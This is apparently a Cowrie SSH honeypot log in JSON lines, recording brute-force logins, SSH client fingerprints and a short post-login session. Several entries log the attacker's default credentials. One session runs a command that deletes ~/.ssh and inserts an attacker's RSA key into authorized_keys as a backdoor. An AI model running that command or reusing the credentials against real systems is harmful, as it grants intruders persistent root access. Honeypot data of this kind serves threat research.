{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:23:39.561014Z","src_ip":"212.227.235.229","session":"723d0b78896e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:23:39.755391Z","src_ip":"151.47.119.51","session":"bdf48b7362de"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:23:40.685778Z","src_ip":"212.227.235.229","session":"723d0b78896e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:40.828430Z","src_ip":"151.47.119.51","session":"bdf48b7362de"}
{"eventid":"cowrie.session.connect","src_ip":"151.47.119.51","src_port":4572,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb85d2ca3771","protocol":"ssh","message":"New connection: 151.47.119.51:4572 (1.2.3.4:22) [session: fb85d2ca3771]","sensor":"my-vps","timestamp":"2025-08-31T05:23:40.893734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:23:40.894766Z","src_ip":"151.47.119.51","session":"fb85d2ca3771"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:23:40.967452Z","src_ip":"151.47.119.51","session":"fb85d2ca3771"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51150,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ceeb555caf4","protocol":"ssh","message":"New connection: 212.227.235.229:51150 (1.2.3.4:22) [session: 7ceeb555caf4]","sensor":"my-vps","timestamp":"2025-08-31T05:23:41.244185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:23:41.249887Z","src_ip":"212.227.235.229","session":"7ceeb555caf4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:23:41.284118Z","src_ip":"151.47.119.51","session":"fb85d2ca3771"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:41.364185Z","src_ip":"151.47.119.51","session":"fb85d2ca3771"}
{"eventid":"cowrie.session.closed","duration":"10.3","message":"Connection lost after 10.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:41.374338Z","src_ip":"151.47.119.51","session":"5cb38568ddd6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:23:41.509052Z","src_ip":"212.227.235.229","session":"7ceeb555caf4"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:41.959620Z","src_ip":"212.227.235.229","session":"723d0b78896e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33328,"dst_ip":"1.2.3.4","dst_port":22,"session":"464e33db7170","protocol":"ssh","message":"New connection: 212.227.235.229:33328 (1.2.3.4:22) [session: 464e33db7170]","sensor":"my-vps","timestamp":"2025-08-31T05:23:42.231884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:23:42.232869Z","src_ip":"212.227.235.229","session":"464e33db7170"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:23:42.505235Z","src_ip":"212.227.235.229","session":"464e33db7170"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd@1234","message":"login attempt [root/passwd@1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:23:42.546334Z","src_ip":"212.227.235.229","session":"7ceeb555caf4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:23:43.084137Z","src_ip":"212.227.235.229","session":"7ceeb555caf4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:23:43.084832Z","src_ip":"212.227.235.229","session":"7ceeb555caf4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:23:43.085831Z","src_ip":"212.227.235.229","session":"7ceeb555caf4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:43.348032Z","src_ip":"212.227.235.229","session":"7ceeb555caf4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:23:43.634970Z","src_ip":"212.227.235.229","session":"464e33db7170"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:23:43.921595Z","src_ip":"212.227.235.229","session":"7ceeb555caf4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:23:43.922352Z","src_ip":"212.227.235.229","session":"7ceeb555caf4"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:43.924689Z","src_ip":"212.227.235.229","session":"2f0729ddf03a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:43.925541Z","src_ip":"212.227.235.229","session":"464e33db7170"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:23:44.179857Z","src_ip":"212.227.235.229","session":"7ceeb555caf4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:44.180779Z","src_ip":"212.227.235.229","session":"7ceeb555caf4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52458,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd0abb95ac9f","protocol":"ssh","message":"New connection: 212.227.235.229:52458 (1.2.3.4:22) [session: fd0abb95ac9f]","sensor":"my-vps","timestamp":"2025-08-31T05:23:44.422195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:23:44.426023Z","src_ip":"212.227.235.229","session":"fd0abb95ac9f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:23:44.677137Z","src_ip":"212.227.235.229","session":"fd0abb95ac9f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:23:45.680727Z","src_ip":"212.227.235.229","session":"fd0abb95ac9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38562,"dst_ip":"1.2.3.4","dst_port":22,"session":"d18e3a42eff9","protocol":"ssh","message":"New connection: 212.227.125.160:38562 (1.2.3.4:22) [session: d18e3a42eff9]","sensor":"my-vps","timestamp":"2025-08-31T05:23:45.681867Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:46.934787Z","src_ip":"212.227.235.229","session":"fd0abb95ac9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53402,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ad28eb59bdf","protocol":"ssh","message":"New connection: 212.227.235.229:53402 (1.2.3.4:22) [session: 2ad28eb59bdf]","sensor":"my-vps","timestamp":"2025-08-31T05:23:47.182122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:23:47.185106Z","src_ip":"212.227.235.229","session":"2ad28eb59bdf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:23:47.441330Z","src_ip":"212.227.235.229","session":"2ad28eb59bdf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:23:48.458427Z","src_ip":"212.227.235.229","session":"2ad28eb59bdf"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:48.714596Z","src_ip":"212.227.235.229","session":"2ad28eb59bdf"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:48.721721Z","src_ip":"212.227.235.229","session":"7ceeb555caf4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:23:52.835728Z","src_ip":"212.227.125.160","session":"d18e3a42eff9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:23:52.836637Z","src_ip":"212.227.125.160","session":"d18e3a42eff9"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":58760,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c27543dcd43","protocol":"ssh","message":"New connection: 170.64.166.123:58760 (1.2.3.4:22) [session: 4c27543dcd43]","sensor":"my-vps","timestamp":"2025-08-31T05:23:52.925905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:23:52.926569Z","src_ip":"170.64.166.123","session":"4c27543dcd43"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:23:53.202144Z","src_ip":"170.64.166.123","session":"4c27543dcd43"}
{"eventid":"cowrie.login.failed","username":"middleware","password":"qwerasdf","message":"login attempt [middleware/qwerasdf] failed","sensor":"my-vps","timestamp":"2025-08-31T05:23:54.344558Z","src_ip":"170.64.166.123","session":"4c27543dcd43"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:55.622462Z","src_ip":"170.64.166.123","session":"4c27543dcd43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59330,"dst_ip":"1.2.3.4","dst_port":22,"session":"14e9ae2e21b7","protocol":"ssh","message":"New connection: 212.227.235.229:59330 (1.2.3.4:22) [session: 14e9ae2e21b7]","sensor":"my-vps","timestamp":"2025-08-31T05:23:58.393494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:23:58.395463Z","src_ip":"212.227.235.229","session":"14e9ae2e21b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:23:58.485920Z","src_ip":"212.227.235.229","session":"14e9ae2e21b7"}
